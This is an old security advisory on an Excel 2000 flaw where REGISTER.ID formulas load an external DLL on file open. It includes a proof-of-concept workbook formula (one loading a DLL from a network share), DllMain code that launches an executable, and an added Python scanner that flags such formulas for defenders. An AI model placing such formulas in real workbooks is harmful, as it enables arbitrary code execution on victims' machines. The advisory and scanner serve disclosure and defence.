Excel 2000 Allows External Code Execution
Reported July 11 by Georgi Guninski

VERSIONS AFFECTED
Excel 2000 (possibly other versions)

DESCRIPTION

Excel can be made to execute code when an Excel workbook file is opened. The problem resides in the REGISTER.ID function, which is used to call functions that reside in external DLLs.

DEMONSTRATION

This code Copyright 2000 Georgi Guninski

-------dll3.xls--------------------------------------------
=REGISTER.ID("C:\DLL1.DLL";"dllmain";"a")
=REGISTER.ID("\\UNC\SHARE\DLL1.DLL";"dllmain";"a")
-----------------------------------------------------------

-------dll1.cpp--------------------------------------------
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
  switch( ul_reason_for_call )
  {
    case DLL_PROCESS_ATTACH:
    // Initialize once for each new process.
    // Return FALSE to fail DLL load.
    // Note: For NT/2000 you may need to move the following code
    // outside the switch()
        MessageBox(NULL, "Hello world!", "Info", MB_OK);
        MessageBox(NULL, "Shall try to start: C:\\TEST.EXE\n You may need to   create it.", "Info", MB_OK);
        system("C:\\TEST.EXE");
        break;
......
---------------------------------------------------

A demonstration is also available at Georgi's Web site:
http://www.nat.bg/~joro/excel2.html
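
For defenders, the following added example (not part of the original advisory or of Georgi Guninski's code) scans formula text already extracted from a workbook for REGISTER.ID calls like those in dll3.xls and reports where the named DLL would be loaded from. It goes beyond the advisory by also matching the related REGISTER and CALL functions; the function names, the (cell, formula) input format and the sample cells are assumptions constructed for illustration.

```python
import re

# Macro-sheet functions that load a DLL named in their first argument.
# REGISTER.ID is the one in the advisory; REGISTER and CALL are related.
_DLL_CALL = re.compile(
    r'\b(REGISTER\.ID|REGISTER|CALL)\s*\(\s*'
    r'"((?:[^"]|"")*)"\s*[;,]\s*'      # module_text (DLL path)
    r'"((?:[^"]|"")*)"',               # procedure (exported name)
    re.IGNORECASE,
)

def classify_module(path):
    """Say where the DLL would be loaded from."""
    if path.startswith(("\\\\", "//")):
        return "unc"          # remote share, as in the second demo formula
    if re.match(r"^[A-Za-z]:[\\/]", path):
        return "local"        # absolute path on a local drive
    return "search-path"      # bare name, resolved by the DLL loader

def find_dll_calls(cells):
    """cells: iterable of (cell_ref, formula_text). Returns a findings list."""
    findings = []
    for ref, formula in cells:
        for m in _DLL_CALL.finditer(formula):
            module = m.group(2).replace('""', '"')
            findings.append({
                "cell": ref,
                "function": m.group(1).upper(),
                "module": module,
                "procedure": m.group(3).replace('""', '"'),
                "origin": classify_module(module),
            })
    return findings

# Constructed sample: the two formulas from dll3.xls plus other cells.
SAMPLE = [
    ("A1", r'=REGISTER.ID("C:\DLL1.DLL";"dllmain";"a")'),
    ("A2", r'=REGISTER.ID("\\UNC\SHARE\DLL1.DLL";"dllmain";"a")'),
    ("A3", "=SUM(B1:B9)"),
    ("A4", "=CALL(5;1)"),  # CALL by register id: no DLL name to report
    ("A5", '=register.id("example.dll","ExampleProc","J")'),
]

if __name__ == "__main__":
    for finding in find_dll_calls(SAMPLE):
        print(finding)
```

Findings with origin "unc" deserve the most attention, since the DLL comes from a share outside the local machine.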

VENDOR RESPONSE

Microsoft is aware of this problem; however, no response was known at the time of this writing.

CREDIT
Discovered by Georgi Guninski